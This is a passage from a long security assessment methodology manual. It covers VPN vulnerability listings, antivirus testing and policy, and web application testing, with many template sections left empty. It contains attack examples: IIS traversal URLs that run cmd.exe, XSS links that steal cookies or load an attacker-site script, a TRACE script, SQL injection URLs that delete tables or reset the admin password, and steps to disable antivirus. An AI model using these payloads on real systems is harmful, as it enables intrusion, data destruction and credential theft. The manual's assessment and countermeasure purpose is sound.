It is also desirable to make the VPN Server inspect the traffic from the clients
connecting.
N.15 VULNERABILITIES AND EXPLOITS
Here you can find some of the most important vulnerabilities and exploits for different
platforms
PPTP Flaws and Exploits:
•
Vendor Information:
http://www.securiteam.com/windowsntfocus/5HP0B0U3FC.html
•
Exploit: http://www.insecure.org/sploits/NT.RAS.PPTP.html
Checkpoint VPN Server:
Several vulnerabilities have been discovered for the Checkpoint family of VPN
Servers
•
2/4/2004 - Checkpoint VPN-1/SecureClient ISAKMP Buffer Overflow
o
ISS X-Force has discovered a flaw in the ISAKMP processing for
both the Checkpoint VPN-1 server and Checkpoint VPN clients
(Securemote/SecureClient). These products collaborate to provide
VPN access to corporate networks for remote client computers.
VPN-1 is the VPN component commonly deployed on Checkpoint
Firewall-1 installations. The IKE component of these products
allows for the unidirectional or bidirectional authentication of two
remote nodes as well as the negotiation of cryptographic
capabilities and keys. A buffer overflow vulnerability exists when
attempting to handle large certificate payloads.
o
•
http://xforce.iss.net/xforce/alerts/id/163
9/3/2002 - SecuRemote usernames can be guessed or sniffed using
IKE exchange
o
While performing a VPN security analysis for one of our
customers, I discovered a potential issue with Firewall-1
SecuRemote IKE which can allow usernames to be guessed. I
also observed the related issue that the SecuRemote IKE
Page 698 of 1123
usernames are passed in the clear which allows them to be
discovered by network sniffing
o
•
http://www.nta-monitor.com/news/checkpoint.htm
18/7/2001 - Checkpoint Firewall-1 Information Leakage (SecuRemote,
Exploit)
o
Checkpoint Firewall-1 makes use of a piece of software called
SecuRemote (a.k.a. SecureRemote) to create encrypted sessions
between users and FW-1 modules. Before remote users are able
to communicate with internal hosts, a network topology of the
protected network is downloaded to the client. While newer
versions of the FW-1 software have the ability to restrict these
downloads to only authenticated sessions, the default setting
allows unauthenticated requests to be honored. This gives a
potential attacker a wealth of information including IP addresses,
network masks, and even friendly descriptions.
o
http://www.securiteam.com/securitynews/5HP0D2A4UC.html
CISCO VPN Servers
•
31/8/2004 - Vulnerabilities in Kerberos 5 Implementation
o
Two vulnerabilities in the Massachusetts Institute of Technology
(MIT) Kerberos 5 leavingcisco.com implementation that affect
Cisco VPN 3000 Series Concentrators have been announced by
the MIT Kerberos Team. Cisco VPN 3000 Series Concentrators
authenticating users against a Kerberos Key Distribution Center
(KDC) may be vulnerable to remote code execution and to Denial
of Service (DoS) attacks. Cisco has made free software available
to address these problems. Cisco VPN 3000 Series Concentrators
not authenticating users against a Kerberos Key Distribution
Center (KDC) are not impacted.
o
http://www.cisco.com/warp/public/707/cisco-sa-20040831krb5.shtml
N.16 GLOBAL COUNTERMEASURES
[Text]
Page 699 of 1123
O ANTI-VIRUS SYSTEM SECURITY ASSESSMENT AND
MANAGEMENT STRATEGY
O.1 DESCRIPTION
With Extensive connectivity across networks within the company & with external
networks & the internet, the proliferation of viruses is a real cause of concern & needs to
be addresses with stern measures. This document briefly spells out Antivirus system
security assessment and their management strategy (i.e. the user policies that our
required & the configuration guidelines for the Antivirus administrator)
Primarily Anti-virus programs can be divided into two types. First which are installed on
network infrastructure and second which are installed on end-user machines. Both have
their own importance.
The network infrastructure Anti-virus programs are commonly installed with Firewall and
with Mail Servers. These programs are good to remove viruses on network level only
and save us greatly to spread them.
The program installed with end users protects on host basis and they don't have an
effect on host performance. These programs rely on end user signatures, which is not
always effective.
O.2 PURPOSE
O.3 REQUIREMENT
[Text]
O.3.1 Understand Organization’s environment
[Text]
O.3.2 Technical Requirements
[Text]
Page 700 of 1123
O.4
BJECTIVE
Viruses, worms, Trojans horses and macros can cause significant damage to information
& IT assets of an organization. As a result, proper policies, procedures and safeguards
shall be put in place to control it.
O.4.1 Perspective One
e.g. Security Assessor/Penetration Tester
O.4.2 Perspective Two
e.g. System Administrator
O.5 EXPECTED RESULT
[Text]
O.6 METHODOLOGY / PROCESS
1. ICAR ANTI VIRUS TEST FILE
(http://www.eicar.org/anti_virus_test_file.htm)
2. ZIP-OF-DEATH TEST
3. SENDING MAILS WITH WORDINGS LIKE *MIDDLESEX*
4. MAIL BOMBING TEST
5. Disabling of Auto Protection
6. Stopping/Disabling of antivirus services by normal privileges
(These two are more likely to be performed when you're already "in" Delete all
executables and dll's found in the AV installation directory)
7. Delete all executables and dll's found in the AV installation directory.
"...The effect is to leave the "shell" of the AVS on the machine, while removing all the
working parts. Kind of like stealing the PC from the inside, leaving the empty case
behind...."
Page 701 of 1123
O.6.1 Anti Virus test file
Description
Pre-requisites
Examples/Results
Analysis/Conclusion/Observation
Links
www.eicar.org/anti_virus_test_file.ht
Tools
Countermeasures
Remarks
Page 702 of 1123
O.6.2 Zip-of-Death test
Description
Pre-requisites
Examples/Results
Analysis/Conclusion/Observation
Links
Tools
Countermeasures
Remarks
Page 703 of 1123
O.6.3 Sending mails with wordings like *Middlesex*
Description
Pre-requisites
Examples/Results
Analysis/Conclusion/Observation
Links
Tools
Countermeasures
Remarks
Page 704 of 1123
O.6.4 Mail bombing test
Description
Pre-requisites
Examples/Results
Analysis/Conclusion/Observation
Links
Tools
Countermeasures
Remarks
Page 705 of 1123
O.6.5 Stopping/Disabling of antivirus services by normal privileges
Description
If you're a local user with no special privileges, you can still disable
some antivirus
programs using the spanish tool VeoVeo (or any other tool that enables greyed controls),
for example this works against McAfee 4.x.
Good to allow the use of xploits like DebPloit, that are reported as malware sometimes.
Pre-requisites
Examples/Results
Analysis/Conclusion/Observation
Links
http://www.hackindex.com/download/veoveo.zip
Tools
Spanish Tool VeoVeo
Countermeasures
Remarks
Page 706 of 1123
O.6.6 Delete all executables and dll's found in the AV installation
directory
Description
"...The effect is to leave the "shell" of the AVS on the machine, while removing all the
working parts. Kind of like stealing the PC from the inside, leaving the empty case
behind...."
Source: 2600 HQ Vol. 21
Pre-requisites
Examples/Results
Analysis/Conclusion/Observation
Links
2600 HQ Vol. 21
Tools
Countermeasures
Remarks
Page 707 of 1123
O.7 AUDIT ANTIVIRUS MANAGEMENT STRATEGY
O.7.1 Check Anti Virus System Standards
1. Segress’ Technical Infrastructure Management (TIM) depart evaluates & approve the
anti-virus & anti worm software, which is used by the company. Segress TIM is using
<Product Name e.g. Nortan Antivirus> Antivirus (NAV) for central anti virus
management.
2. Virus checking systems (NAV clients) approved by Segress TIM depart are installed
on all personal computers, laptops & servers.
3. The entire anti virus solution sell of organization is set up in such a way that the latest
versions of the anti virus software are automatically updated on every server and
desktop from a designated anti virus server. This is a key aspect to centralized
management as the status of all Antivirus servers belonging to different locations is
known & monitored.
4. The default settings of the anti virus software is configured to offer adequate security
to detect all viruses / worms at the immediate point of entry. This is applicable to all
server based (Internet mail, proxy) & desktop based systems
5. Detective scans are also undertaken / scheduled at predetermined intervals
automatically.
6. Users are not granted access to turn off or disable virus-checking systems
7. User possession or development of viruses or other malicious software is prohibited.
8. Being a centrally managed system all virus events are logged at the primary (central)
Antivirus server. These log files are continuously monitored for changes to the systems
configuration & all virus activity. Appropriate action is taken on finding virus activity like
Page 708 of 1123
running 3rd party software in the eventuality that the current Antivirus program is not
able to disinfect the systems.
Page 709 of 1123
O.7.2 Check End User Antivirus Guidelines
Anti-virus must be installed & running on the system
Make sure you have a virus protection program installed on your computer/desktop and
be sure it updates its virus definitions regularly. Segress TIM have decided on <XYZ
vendor> corporate standard antivirus program
•
Backup critical files
The only reliable method to guard against loss of data to virus infections is to backup the
critical files on some other media. Identify the critical files & folders that require backing
up.
•
Do not share folders without passwords
The newer generation viruses are more intelligent as they scan for folders that are
shared on the Windows network without passwords & often infect or delete the files
within them. Users must protect their folders with a difficult to guess password & share
them with individuals only on a need to know basis.
•
Make sure that the Antivirus updates are the latest
E.g. Norton Antivirus has a feature called "Live Update" that allows it go out on the web
and get the latest virus definitions. The Anti-virus definitions are updated automatically
but if there is a problem this might have to be done manually. You can schedule live
update to occur on a regular basis: once a week is reasonable. Check the software
periodically to make sure it is doing the updates. You can always update it manually if
need be.
•
Do not turn off PC scans
The Antivirus installed on your system may have been scheduled to scan your system at
regular intervals. Do not turn off or terminate this system scan.
•
Trash Questionable E-mail messages.
Don't open questionable e-mail messages or attachments -- just trash them. Segress is
using Lotus Notes. This being a more secure system the likelihood of virus attacks using
e-mail is rare. Outlook Express is more susceptible to viruses because it is the more
common e-mail program and more viruses are written to attack it or use it to propagate
Page 710 of 1123
them. Sometimes an Outlook Express user will get a virus in an e-mail message and the
virus will infect his or her computer even though he or she doesn't open the message
due to vulnerability in system.
•
Do not pass on Hoax Viruses
Do not pass on e-mail messages about new viruses asking you to forward the message
to everyone you know. They usually claim to have gotten the information from some
reputable company. Those are almost invariably hoaxes. You should pass this on to the
system administrator.
Page 711 of 1123
O.7.3 Check NAV Server Configuration Procedures
O.7.3.1 4
O.7.3.2 ANTIVIRUS SERVER CONFIGURATION
•
There should be a designated primary Antivirus server. This system will control all
the configuration parameters for the other Antivirus systems at different locations.
•
Updates to this server must be made from the appropriate vendor’s official internet
site
•
This server shall check for updates to the virus definitions every 30 mins. Once
downloaded the server should also push the updates to the secondary servers.
O.7.3.3 ALERTS CONFIGURATION
•
The information on the virus found must be propagated to the primary server.
•
This primary server on finding a unique virus strain with high severity rating must
alert the administrator via e-mail pager or other notification methods about its
presence.
O.7.3.4 CONFIGURING SCAN OPTIONS
•
Scan options are the settings Norton Antivirus uses when it scans your computer for
virus-infected files. In most cases, you should set scan options before you run a
scan. You can set up unique configurations for scans performed while you wait and
scans performed during real-time protection. These options include:
O.7.3.5 SELECTING FILE TYPES TO SCAN
•
The time to complete a scan can be reduced by limiting the scan to files with
selected extensions. Configure it to scan .EXE, .COM, .DLL, .DOC, The systems
must be scanned at regular intervals; This is the only way to ensure that the
computer is virus-free.
O.7.3.6 ZIP/ COMPRESSED FILE SCANNING
•
Scanning files inside compressed files should be turned on. The scanning host
should be configured to scan for at least 3 levels of zip files.
Page 712 of 1123
O.7.3.7 SELECTING EXCLUSIONS TO THE SCAN
•
This should be dealt with on a case-to-case basis depending on the false positives
that are being generated. We can configure NAV to either skip scanning a file or
scanning for a particular virus.
O.7.3.8 SELECTING THE LOCATION OF THE SCAN
•
The NAV Client must be configured to scan all system drives excluding read-only
media. The scan must be scheduled to run everyday at 12:30 PM
O.7.3.9 CREATING A NOTIFICATION THAT A VIRUS WAS DETECTED
•
All NAV Clients must be configured to send the notification of the virus detected to
the Central server. The notification should give the following details
•
Name of computer
•
Name of detected virus
•
Full file path and name
•
Login name of user
•
Type of scan
•
Action taken on infection
•
Filename (no path)
O.7.3.10
CHOOSING ACTION(S) TO PERFORM ON INFECTED FILES
(all types of viruses)
•
The NAV Clients must be configured to first try & disinfect the virus. If on failure of
disinfection the file must be quarantined or deleted.
O.8 ANTIVIRUS REPORTS
These reports are to be generated to know the effectiveness of the Antivirus
management strategy. These reports will include information on the viruses found by the
AV system & the hosts they are originating from & the threat that the viruses pose.
These reports categorized into two
O.8.1 Administrator AV Report
This report is for the AV administrator at each location. He gets information on the
following
Page 713 of 1123
1) Top 10 viruses & number of virus instances found & each virus’s classification level.
2) Top 10 computers (sorted by number of viruses found)
Refer the section on "Threat Severity Assessment" for more details.
In addition to the above he would provide the reason for the top 10 virus infections as an
input to the Management report.
O.8.2 Management AV Report
The management AV report will give the senior & middle level management an overview
of the virus activity within the organization & take further preventive steps. The
management reports detail
1) 5 - 10 Unique strains of viruses found in Segress (along with the reason for the
infection)
2) Breakup of the infection at different locations.
O.9 THREAT SEVERITY REVIEW
Please refer Risk Assessment Section
Page 714 of 1123
Page 715 of 1123
P WEB APPLICATION SECURITY ASSESSMENT
P.1 DESCRIPTION
This chapter explains how to assess Web Applications. As the use of internet is
increasing day by day, the numbers of web sites are increasing day by day. Many banks,
educational institutes and large corporates are using web this days to make their work
faster, to make their client and employees updated regularly. As companies has to allow
traffic of the web as they are using web application to fulfill their requirements. This
makes essential to have secure web application.
As per net craft’s survey, the number of site on the internet now is 56,923,737
P.1.1 What is Web Application Security Assessment?
Web application security is the security of the web application being used, web server
running web application and the modules running on the web server. Normally attacker
prefers to attack on web application as no firewall blocks requests on the web server.
P.2 PURPOSE
To make web application and web server secure as much as possible and stop
disclosing unnecessary information out and make it hard for attacker to gain access.
Page 716 of 1123
P.3 OBJECTIVE
To get the access of the remote machine by even escaping firewall and than enumerate
the network. To gather any available credentials from the network and servers
P.4 EXPECTED RESULT
Normally corporation puts firewall to make them secure but as companies are using web
for their communication and other purpose firewall has to allow the traffic on port 80
which is an web server.
P.5 METHODOLOGY
P.5.1 Identifying Web Server vendor and version
First step to begin web application assessment is to identify the web server on which
application is running. To detect web server following two methods can be used:
1) By Banner grabbing (Explained in Section A.5.2)
2) Web Server detection using automated tools. (Explained in Section A.5.3)
3) Default File Detection (Explained in Section A.5.4)
4) Checking the file extension on the server (Explained in Section A.5.5)
Tools
Netcat, Httprint
Further Reading[s]
http://net-square.com/httprint
Page 717 of 1123
P.5.2 Identifying Web Server vendor and version - By Banner Grabbing
Description
To determine web server manually, One has to check response header of the server. To
check the response header, send request using netcat (nc). Send an HEAD request to the
server and server will return the response header. HEAD is the method which is used to
get the response header from the server. In the response, there will be one tag named
“Server” which specifies the server name. It is also possible that server administrator have
disabled the HEAD method, in such case one can send GET method and get the response
from the server and check the header. In case of GET, server will return the response
header with contents.
Pre-requisite[s]
Examples/Results
C:\>nc www.oissg.org 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Tue, 12 Oct 2004 03:48:49 GMT
Server: Apache
Set-Cookie: sessioncookie=7a322bc75fac0e2792a81978e335c33e; expires=Tue, 12-Oct04 15:48:49 GMT; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 12 Oct 2004 03:48:50 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=iso-8859-1
Analysis/Conclusion/Observation
Above example shows response header returned by server. Check the “Server” tag in
response header. In upper example, it shows some flavour of apache is running. In many
Page 718 of 1123
case, response header will show the server name as well as the version.
Countermeasures
•
Change the server tag in response header.
Tool[s]
•
netcat
Further Reading[s]
Remarks
Page 719 of 1123
P.5.3 Identifying Web Server vendor and version - using automated
tools
Description
It is not necessary that server tag in response header always shows the correct result.
Admin may have been obfuscated by changing the server banner strings, or by plug-ins
such as mod_security or servermask. In such cases it is hard to determine which server is
running. To determine the server name and version an automated free tool named httprint
can be used to determine the server name. This tool is available on multiple os like win32,
linux, BSD and Mac. This tool uses HttpFingerprinting method to determine the web server.
It sends multiple requests to server and analyzes the response and determines the server.
This tool can also be used to identify web enabled devices.
Pre-requisite[s]
Examples/Results
Page 720 of 1123
Analysis/Conclusion/Observation
Countermeasures
•
Tool[s]
•
HTTPRINT
Further Reading[s]
http://net-square.com/httprint
Remarks
Page 721 of 1123
P.5.4 Identifying Web Server vendor and version – By default files
Description
It is normal behavior of server that it exposes few default directories and pages in default
installation. There are two methods to check the default files and directories.
1) Manual
2) Automated Tool: A perl script named whisker can be used to determine the default
page and directories on the server.
Pre-requisite[s]
Examples/Results
D:/ perl whisker.pl -h 192.168.7.216 -s scan.db -p 80 -W -l cool.html
Analysis/Conclusion/Observation
As the server was not configured properly, It has default directories. Whisker catch it as IIS
5.0 is running as marked above.
Countermeasures
•
Stop access on default pages of the server.
Tool[s]
•
browser, Whisker
Further Reading[s]
Remarks
Page 722 of 1123
P.5.5 Identifying Web Server vendor and version – By Determine the
extension of web pages on the web server
Description
It is very important to check extension of the web pages on web server. This will help a lot
in determining the Web server and the OS on which web server is running. It is also
possible to give any extension but normally people keeps the default extensions. Though
this is not a full proof solution but it is one of the way to determine the server
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
My Experience suggest following, like asp pages are normally ported on IIS where aspx
and asmx pages are ported on IIS 5.1 onwards. Following are few of them.
.cfm – Cold Fusion
.asp – IIS
.aspx – IIS 5.1 onwards
Countermeasures
Tool[s]
•
Browser
Further Reading[s]
Remarks
It is also possible to port asp pages in apache. Moreover, extension does not mean
anything in the world of linux so one can not take decision just by analyzing extension.
Page 723 of 1123
P.5.6 Identifying Web Server vendor and version - Identify Web Server
directory structure
Description
Once detection of web server and modules on the web server, The next step is to
determine the directory structure in the server. One can use crawler like blackwidow or web
copier for this purpose. But this can be manually determined quite easily by surfing the
pages of the site.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
•
Browser.
Further Reading[s]
Remarks
Page 724 of 1123
P.5.7 Identifying Web Server vendor and version (Continue…)
Description
Identifying web server is not enough. While assessment, we also have to Identify other
modules running on web server. Sometime it is also possible that server gets sacrifice due
to vulnerability of some module running on the server.
Pre-requisite[s]
Examples/Results
c:\>nc www.oissg.org 80
HEAD / HTTP/1.0
HTTP/1.1 301 Moved Permanently
Date: Sat, 27 Nov 2004 14:42:18 GMT
Server:
Apache/1.3.28(Unix)
mod_auth_passthrough/1.8
mod_log_bytes/1.2
mod_bwlmited/1.4 PHP/4.3.2 FrontPage/5.0.2.2634 mod_ssl/2.8.15 OpenSSL/0.9.6b
Location: http://www.oissg.org/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Analysis/Conclusion/Observation
From the above response header, it can be deduced that some version of apache is
running with modules like php, frontpage, ssl. This modules can be exploited later to get
the serves shell. It also shows the version of modules which are running. Interesting thing
in this response header is it also shows the OS on which web server is running.
Countermeasures
•
Change the server tag
Tool[s]
•
Netcat
Further Reading[s]
Page 725 of 1123
Remarks
Page 726 of 1123
P.5.8 Copy web site (Offline)
Description
Copying the whole WebSite and testing it for vulnerabilities is very convenient for looking
various threats like searching particular keyword, searching of valid e-mails, external links
etc. Normally, tools are used to copy the Web Site. Working on offline web site helps in
many ways like fast response, save bandwidth. could be used to check for the
vulnerabilities/threats.
Pre-requisite[s]
Examples/Results
Page 727 of 1123
Analysis/Conclusion/Observation
Countermeasures
•
Tool[s]
•
HTTTRACK, BlackWidow, WebCopier, wget
Further Reading[s]
Remarks
Page 728 of 1123
P.5.9 Test View Source bugs
Once the site is copied, you can go through the source of the each page and found
many information. Page Source can contain following information.
1) User names
2) Default password
3) E-mail address
4) Auto redirection information
5) External Links
P.5.9.1 FIND USERNAME BY VIEW SOURCE
Description
View source can be used to find the user name and password in the source of the web
pages. Many times for the sack of convenience the developers store their names in the
source in form of comments. These can be found out using the view source and searching
for the usernames. One can write a c program or an regex pattern to find out the same.
Pre-requisite[s]
Examples/Results
Page 729 of 1123
Analysis/Conclusion/Observation
As shows in the example, User has wrote his name to mention the developer of the page. If
this site name is oissg.org than chances are quite fancy that there is one account called
“hemil” on it.
Countermeasures
•
Never Store username or developer name in comments
Tool[s]
•
Browser, Editor
Further Reading[s]
Remarks
Page 730 of 1123
P.5.9.2 FIND DEFAULT PASSWORD BY VIEW SOURCE
Description
Find keyword like "pass" into .html files:
As explained above, the source code may contain the default passwords stored in the form
of comments, the keywords like pass or passwd etc. can be searched to get the
information. Also the keywords "pass" can be looked to get the information about the
password input field (like length etc.). One can write a c program or use a regex pattern to
find out the same.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
In Above point, we got the username as user has mentioned his name. Here he created
one password to test his application but smartly he has not mentioned his name. But in a
way, he wrote his name at the end of the page. So now we got both username as well as
password.
Countermeasures
•
Never Store passwords in comments.
Tool[s]
•
Browser, Editor
Further Reading[s]
Page 731 of 1123
Remarks
Page 732 of 1123
P.5.9.3 FIND EMAIL ADDRESSES
Description
The source of web page may contain the e-mail addresses of the developers, vendors or
some other persons, which can be of great importance. These addresses can be searched
into the source code of the web page. One can write a c program or use a regex pattern to
find out the same.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
In above case, Users intension is not to expose anything but he wrote his email address so
anyone can send an email across to him for any modification to the page. But that gives
one email address on the site.
Countermeasures
•
Do not write any email addresses in the comments
Tool[s]
•
Browser, Editor
Further Reading[s]
Remarks
Page 733 of 1123
P.5.9.4 CHECK HTTP-EQUIV FOR AUTO REDIRECTION
Description
HTTP-EQUIV auto redirection can be checked to get the additional information like where
the web page is being redirect as well as various other information can be obtained like:
< META HTTP-EQUIV="REFRESH" CONTENT="120">
- Refresh page in browser each 120 seconds.
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
- Don't cache the page in browser or on proxy server.
<META
HTTP-EQUIV=
"mailto:
yourname@yourserver.com"
CONTENT="NO-
CACHE">Click here to mail me.
- Can be used to compose the mail with appropriate subject to the site vendor etc.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Tool[s]
•
Further Reading[s]
Remarks
Page 734 of 1123
P.5.9.5 FIND EXTERNAL LINKS
Description
Using the view source option of the user browser external links that were defined in the
web page can be retrieved. These links can be used further to evaluate the other related
links available in the web page or web site. One need to search for “href” to find the links.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Tool[s]
•
Browser, Editor
Further Reading[s]
Remarks
Page 735 of 1123
P.6 TEST COMMON GATEWAY INTERFACE
P.6.1 Test Common Gateway Interface
Description
Normally this attack is known as CGI attack, Using this attack, victim can be forced to give
up files and directories with a simple "GET" command, and execute remote commands that
would disable access controls.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Tool[s]
Further Reading[s]
Remarks
Page 736 of 1123
P.7 TEST DIRECTORY TRAVERSAL
P.7.1 Test Directory Traversal
Description
Tis vulnerability affects all versions of Windows with IIS 5 installed and running and the
Personal Web Server 4 on Windows 98. It is also commented that this will work on NT 4.
The Directory Traversal vulnerability focuses on the Web service within IIS.
This exploit works by an attacker constructing a URL that would cause IIS to navigate to
any desired folder in the same logical drive and access the files in it. This can be achieved
by using the Unicode character representations of "/" and "\". This allows a user to traverse
the server to any directory on the same logical drive as the web application. In addition to
this, unauthenticated users can perform delete, modify or execute task in the directories.
This is possible because by default, an attacker will use the IUSR_machinename account.
Which is an default account and who is member of the everyone and users group. By using
this method, a remote user with no credentials can get access as the same as a user who
could successfully log on. Therefore, any file on the same drive as any web-accessible file
that is accessible to these groups, can be manipulated.
Pre-requisite[s]
Examples/Results
Http://www.oissg.org/scripts/..%c1%1c.../winnt/system32/cmd.exe?/c+dir
Http://www.oissg.org/scripts/..%c0%2f.../winnt/system32/cmd.exe?/c+dir
Http://www.oissg.org/scripts/..%c0%af.../winnt/system32/cmd.exe?/c+dir
Http://www.oissg.org/scripts/..%c1%9c.../winnt/system32/cmd.exe?/c+dir
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Browser
Further Reading[s]
Page 737 of 1123
http://www.infosecwriters.com/texts.php?op=display&id=16#intro
Remarks
Page 738 of 1123
P.8 TEST PRODUCT SPECIFIC ISSUES
P.8.1 Test Product Specific Issue
Description
As we had already determined the web server on which web application is running and he
modules running on that web server, we can exploit the web server and modules to get the
access to the remote machine.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Patch the web server regularly
Tool[s]
Browser
Further Reading[s]
http://securityfocus.com/bid
Remarks
Page 739 of 1123
P.9 CHECK DIRECTORIES WHICH ARE NOT MAPPED IN THE PAGES
P.9.1 Directories which are not mapped in the pages
Description
Many times, administrator keeps directories named /tmp, /src, /abc, /xyz, /bkup to keep the
source code of application or for some backup purpose without keeping any link in to web
application. It is good to check for those directories. A perl script named nikto can be used
to check such directories.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Tool[s]
•
Nikto
Further Reading[s]
Page 740 of 1123
Remarks
Page 741 of 1123
P.9.2 Browsable Directories check
Description
Browsable directory means showing the list of all files on the directory. If default page is not
set for any directory, many web servers keep their directory browsable. This vuln will help
in accessing files which are not linked in to web pages and many times led in to exposing
unnecessary information.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Stop access of all the directories which are not necessary
Tool[s]
•
Browser
Further Reading[s]
Remarks
Page 742 of 1123
P.10TEST INVALIDATED PARAMETERS
P.10.1
Cross Site Scripting
P.10.2
Cross Site Scripting
Description
The core of cross-site scripting is that an attacker causes a rightful web server to send a
page to a victim's browser that contains malicious script and/or HTML of the attacker’s
choice. The malicious script runs with the privileges of the script originating from the rightful
web server.
Cross site scripting (also known as XSS and CSS) occurs when a web application
gathers malicious data from a user. The data is usually gathered in the form of a hyperlink
which contains malicious content within it. The user will most likely click on this link from
another Website, web board, email, or from an instant message.
How cross site scripting works?
1) Victim logs into the target site
Could occur through social engineering by attacker
Log in to your account to get this special offer!!!
2) Victim then clicks on a URL or visits a web site that includes the malicious code
3) Victim user’s browser transmits malicious code to the vulnerable script on the target site
as a web request
4) Target site reflects the malicious code back to the victim user’s browser in the response
to the request
5) Malicious code executes within victim user’s browser under the security context of the
target site
How Cross Site Scripting Works?
Page 743 of 1123
To launch XSS, attacker's script must be sent to the victim
Three Ways to send attacker’s script to victim:
„
Inter-user communication within the target site (i.e., message board, etc.)
„
URL provided on a third-party web site (either clicked on by victim user or
automatically loaded when visiting a malicious web site.)
„ URL embedded in an email or newsgroup posting.
Pre-requisite[s]
Examples/Results
Examples of an HTML link that causes the user to send malicious data to another site:
<A
HREF="http://CSS-Vulnerable.com
/display.asp?
Name
=
<SCRIPT>
Name
=
<SCRIPT
alert
(document.cookie) </SCRIPT> Click here </A>
[Malicious Script is appended in the URL.]
<A
HREF="http://CSS-vulnerable.com
/display.asp?
SRC=
'http://attacker-site / my_bad_script_file’ > </SCRIPT>"> Click here </A>
Page 744 of 1123
Malicious Script could be sent in the Post:
Hello
message
board.
This
<SCRIPT>malicious
is
a
message.
code</SCRIPT>
This is the end of my message.
Analysis/Conclusion/Observation
Countermeasures
•
Input Filtering: Properly sanitizing user input data.
•
Output Filtering: Filter user data when it is sent back to the user’s browser.
•
Use of firewall: Use third party application firewall, which intercepts XSS before
they reach the web server & the vulnerable scripts, and blocks them.
Disable client site scripting: The best protection is to disable scripting when it
•
isn’t required.
Use Signed Scripting: Another solution is to have “signed scripting” such that any
•
script with an invalid or un-trusted signature would not be run automatically.
Tool[s]
Further Reading[s]
Remarks
Page 745 of 1123
P.10.3
Cross Site Tracing
P.10.4
Cross Site Tracing
Description
¾ Trace Request Method.
“Trace” is simply used as an input data echo mechanism for the http protocol. This
request is commonly used for debug & other connection analysis activities.
¾ Http Only Cookie Option.
Http Only is a HTTP cookie option used to inform the browser not to allow scripting
language access to “document.cookie” object.
¾
How to gain access to the Cookie normally contained in
document.cookie while
HttpOnly option is used.
¾ Trace request is not allowed by browser when using an html form.
¾ How to initiate a Trace request using some scripting language, which is not allowed in
HTML.
Generating Trace Request
Initiating Trace request using XML HTTP object:
example:
<script type=”text/javascript”>
<!-function sendTrace () {
var xmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”);
xmlHttp.open(“TRACE”, “http://foo.bar”,false);
xmlHttp.send();
xmlDoc=xmlHttp.responseText;
alert(xmlDoc);
}
//-->
</script>
<INPUT TYPE=BUTTON OnClick=”sendTrace();” VALUE=”Send Trace Request”>
Pre-requisite[s]
Page 746 of 1123
¾ XST enabled link
¾ The server must support the TRACE method (which many do).
¾ Browser should support some kind of scriptable object capable of making an HTTP
request.
¾ No need for a dynamic HTML page on the target site which redisplayed HTML content
unfiltered.
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Disable TRACE method on the web server
Tool[s]
Further Reading[s]
Remarks
Page 747 of 1123
P.11URL MANIPULATION
P.11.1
URL Manipulation
Description
HTML Pages/Forms uses two methods for passing the values between the pages one is
GET & another is POST method.
What is query string?
•
Information Appended after URL using ? Mark.
•
QueryStrings are used for passing the information across the pages.
•
Asp page uses the GET method to pass information as a query string.
•
URL QueryString is easily visible to anybody in address bar
•
Any malicious user can manipulate the URL QueryString easily
•
Any malicious user can see the QueryString
•
Malicious user can modify the QueryString
Using URL manipulation a malicious user
•
can get unauthorised access of user’s accounts
•
can get master access of the database
•
can manipulate the database contents
•
even can delete the database tables
Database Manipulation:
An attacker can manipulate the URL parameter’s name to identify database fields:
http://www.yoursite.com/phones/phonelist.cgi?phoneid=34
Attacker manipulates the URL by adding the DELETE command:
http://www.yoursite.com/phones/phonelist.cgi?phoneid=34; delete from phones
Request is transferred from app to database and executes the following SQL:
Page 748 of 1123
SELECT name, phone FROM phones WHERE phoneid=34; DELETE FROM phones
When the information is passed between the pages using the GET method, it is appended
to the URL. The appended information that is passed to another page is the Query String.
Thus, anybody can see the information that is passing between the pages; even it can
make modifications in the URL before submission to the server.
Sometime applications uses client side validation for different fields, i.e. size, data type,
especially in the case of javascript or vb script pages. Once can use Tool named ACHILES
to modify the request between client and the server.
Plaugins are available for some browser to check the request between client and the
server. One I know at this point is livehttpheader in mozilla.
A form may contain various fields like textbox, checkbox, hidden fields etc. whose values
are to be passed to the other pages. Thus one can use the ‘GET method’ to pass the value
and all the values are appended to the URL after the “?” along with name-value pairs for
each form field.
Uses of the URL QueryString:
ƒ
To pass the authentication information
ƒ
To manage the session.
ƒ
To pass the various Field information.
Web applications require the authentication before a user Log In to the WebSite. Thus this
requires passing the information like user Name and Password for the authentication
purpose. For this authentication, Any method from following can be used.
1) Basic
2) Ntlm
3) Digest
Pre-requisite[s]
Examples/Results
•
Example: Changing SQL values
Page 749 of 1123
–
UPDATE usertable SET pwd=‘$INPUT[pwd]’ WHERE uid=‘$INPUT[uid]’;
–
Normal input: http://www.victim.com/cpwd?opwd=y&pwd=x&uid=testuser
–
Malicious
input:
http://www.victim.com/cpwd?opwd=y&pwd=x&uid=testuser’+or+uid+like’%2
5admin%25’;
In URL encoding %25 = %
–
Result: changed Administrator password
Analysis/Conclusion/Observation
•
Valid transaction:
•
http://www.victim.com/tx?acctnum=12&debitamt=100
•
Malicious transaction:
•
http://www.victim.com/tx?acctnum=12&creditamt=1000000
•
Mitigation: whenever parameters are sent, check session token
Countermeasures
•
Tool[s]
•
Further Reading[s]
